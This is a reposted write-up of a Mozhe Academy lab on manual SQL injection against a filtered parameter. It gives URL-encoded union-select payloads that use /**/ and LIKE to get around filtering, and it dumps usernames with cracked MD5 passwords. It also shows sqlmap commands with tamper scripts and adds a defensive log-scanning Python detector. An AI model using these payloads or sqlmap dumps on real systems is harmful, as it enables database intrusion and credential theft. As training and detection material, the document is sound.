墨者学院 (Mozhe Academy) -- Manual Injection Vulnerability Test After SQL Character Filtering (Question 1)

Following the basic procedure, entering a single quote in the URL produces an error, which indicates SQL injection is present. However, after entering order by and union select the page stays normal, so the characters we entered are probably being filtered.
The filtered "=" sign can be replaced with LIKE, and spaces can be replaced with /**/.

Determining the number of columns

/**/order/**/by/**/4

Here is an online URL encode/decode site:

http://web.chacuo.net/charseturlencode

Because the characters are filtered, we URL-encode the payload: %2f%2a%2a%2f%6f%72%64%65%72%2f%2a%2a%2f%62%79%2f%2a%2a%2f%34
http://219.153.49.228:48746/new_list.php?id=1%2f%2a%2a%2f%6f%72%64%65%72%2f%2a%2a%2f%62%79%2f%2a%2a%2f%34
The page is normal, which shows the number of columns is 4.
Determining the echo positions
First write out the original SQL statement. The first part of the union query has to fail (hence id=-1) so that the results of the second query are displayed.

-1/**/union/**/select/**/1,2,3,4

After URL encoding: %2d%31%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74%2f%2a%2a%2f%31%2c%32%2c%33%2c%34
Positions 2 and 3 are echoed successfully; next we use these two echo positions to query the database.

Querying the database
Original SQL statement

-1/**/union/**/select/**/1,database(),user(),4

After encoding: %2d%31%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74%2f%2a%2a%2f%31%2c%64%61%74%61%62%61%73%65%28%29%2c%75%73%65%72%28%29%2c%34

The page echoes the database name mozhe_discuz_stormgroup and the user root@localhost.

Querying the tables of the database
Original SQL statement

-1/**/union/**/select/**/1,group_concat(table_name),3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()

After encoding: %2d%31%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74%2f%2a%2a%2f%31%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%74%61%62%6c%65%5f%6e%61%6d%65%29%2c%33%2c%34%2f%2a%2a%2f%66%72%6f%6d%2f%2a%2a%2f%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%2f%2a%2a%2f%77%68%65%72%65%2f%2a%2a%2f%74%61%62%6c%65%5f%73%63%68%65%6d%61%2f%2a%2a%2f%6c%69%6b%65%2f%2a%2a%2f%64%61%74%61%62%61%73%65%28%29%0a
The page echoes two tables: notice and stormgroup_member.

Querying the columns of the table
Original SQL statement

-1/**/union/**/select/**/1,group_concat(column_name),3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/database()/**/and/**/table_name/**/like'stormgroup_member'

After encoding: %2d%31%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74%2f%2a%2a%2f%31%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%29%2c%33%2c%34%2f%2a%2a%2f%66%72%6f%6d%2f%2a%2a%2f%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73%2f%2a%2a%2f%77%68%65%72%65%2f%2a%2a%2f%74%61%62%6c%65%5f%73%63%68%65%6d%61%2f%2a%2a%2f%6c%69%6b%65%2f%2a%2a%2f%64%61%74%61%62%61%73%65%28%29%2f%2a%2a%2f%61%6e%64%2f%2a%2a%2f%74%61%62%6c%65%5f%6e%61%6d%65%2f%2a%2a%2f%6c%69%6b%65%27%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72%27
The page echoes four columns: id, name, password, status.
Querying the column values
Original SQL statement

-1/**/union/**/select/**/1,group_concat(id,name,password,status),3,4/**/from/**/stormgroup_member

After encoding: %2d%31%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74%2f%2a%2a%2f%31%2c%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%69%64%2c%6e%61%6d%65%2c%70%61%73%73%77%6f%72%64%2c%73%74%61%74%75%73%29%2c%33%2c%34%2f%2a%2a%2f%66%72%6f%6d%2f%2a%2a%2f%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72
The page echoes the contents (MD5 hashes decrypted on the right):
mozhe356f589a7df439f6f744ff19bb8092c0 -> decrypted: dsan13
mozhea6babd9eb561e9ffd6f5aad28851daa7 -> decrypted: nothere
adminf39b2034e52acfb7fc1c51d227d03d10 -> decrypted: 111150

Method 2: automated detection with sqlmap
Here we need to use sqlmap's tamper scripts.
Because this lab filters spaces and the = sign, and the URL has to be encoded, we need three scripts:

charencode.py: URL-encodes every character of the given payload (encodes the URL without touching characters that are already encoded)
space2comment.py: replaces spaces with /**/
equaltolike.py: replaces = with LIKE
Other commonly used scripts are listed at:

https://www.cnblogs.com/mark0/p/12349551.html

Next, probe with sqlmap.
Get the databases

sqlmap -u "http://219.153.49.228:43785/new_list.php?id=1" --batch  --tamper charencode,space2comment,equaltolike --dbs

Get the tables

sqlmap -u "http://219.153.49.228:43785/new_list.php?id=1" --batch  --tamper charencode,space2comment,equaltolike -D mozhe_discuz_stormgroup --tables

Get the columns

sqlmap -u "http://219.153.49.228:43785/new_list.php?id=1" --batch  --tamper charencode,space2comment,equaltolike -D mozhe_discuz_stormgroup -T stormgroup_member --columns

Get the column contents

sqlmap -u "http://219.153.49.228:43785/new_list.php?id=1" --batch  --tamper charencode,space2comment,equaltolike -D mozhe_discuz_stormgroup -T stormgroup_member -C id,name,password,status --dump

Finally, after decrypting the MD5 hashes, log in to the back end to obtain the key.
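As an added, defender-side example (not part of the original post), the Python below normalizes request URIs the way a WAF rule or log-analysis job should before matching: it percent-decodes (bounded, so double encoding is also undone, which is what charencode produces), replaces /**/ comments with spaces (undoing space2comment), and then checks for the order by, union select and information_schema patterns seen in the manual payloads above. The access-log lines are constructed sample data; the pattern names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post). The first
# two carry the lab's obfuscated payloads; the third is a benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2021:10:00:00 +0000] "GET /new_list.php?id=1%2f%2a%2a%2f%6f%72%64%65%72%2f%2a%2a%2f%62%79%2f%2a%2a%2f%34 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2021:10:00:03 +0000] "GET /new_list.php?id=-1/**/union/**/select/**/1,database(),user(),4 HTTP/1.1" 200 498
10.0.0.7 - - [01/Jan/2021:10:00:09 +0000] "GET /new_list.php?id=7 HTTP/1.1" 200 640
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Matched against the *normalized* URI, so /**/ and %xx encoding cannot hide them.
SQLI_PATTERNS = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.", re.I),
    "db_functions": re.compile(r"\b(?:database|user|group_concat)\s*\(", re.I),
}

def normalize(uri: str) -> str:
    """Undo the lab's evasions: percent-encoding (repeated, bounded, to catch
    double encoding), /**/ used as a space, and runs of whitespace."""
    decoded = uri
    for _ in range(3):  # stop as soon as decoding no longer changes anything
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)  # inline comment -> space
    return re.sub(r"\s+", " ", decoded).strip()

def classify(line: str) -> list[str]:
    """Names of the SQLi patterns matched by one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    uri = normalize(m.group(1))
    return [name for name, pat in SQLI_PATTERNS.items() if pat.search(uri)]

def scan(log: str) -> list[tuple[str, list[str]]]:
    """(raw request URI, matched pattern names) for each suspicious log line."""
    hits = []
    for line in log.splitlines():
        matched = classify(line)
        if matched:
            hits.append((REQUEST_RE.search(line).group(1), matched))
    return hits
```

Running scan(SAMPLE_LOG) flags the first two lines and leaves the plain id=7 request alone; the same normalize step is what lets a blocklist see through the /**/ and %xx tricks the lab relies on, although parameterized queries remain the actual fix.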


Reposted from blog.csdn.net/qq_43590351/article/details/112862328